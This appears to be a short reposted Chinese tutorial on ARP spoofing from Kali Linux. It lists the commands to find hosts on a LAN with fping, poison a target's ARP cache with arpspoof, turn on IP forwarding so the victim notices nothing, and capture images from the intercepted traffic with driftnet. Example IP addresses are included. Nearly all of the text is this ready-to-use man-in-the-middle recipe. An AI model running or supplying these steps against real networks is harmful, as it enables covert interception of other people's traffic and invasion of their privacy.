kali之ARP欺騙


arpspoof -i kali網卡 -t 目標ip 網關
ifconfig得到網關,網卡eth0   
目標ip:192.168.216.131  網關:192.168.216.2   (ip route show)



看局域網ip   fping -asg 192.168.3.0/24


獲取圖片
arpspoof -i kali網卡 -t 目標ip 網關
進行ip流量轉發 echo 1 >>proc/sys/net/ipv4/ip_forward    echo寫命令不會有顯示 成功欺騙,目標ip不會斷網
driftnet  --》獲取本機網卡的圖片  
driftnet -i eth0



查看Ubuntu網關 ip route show


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM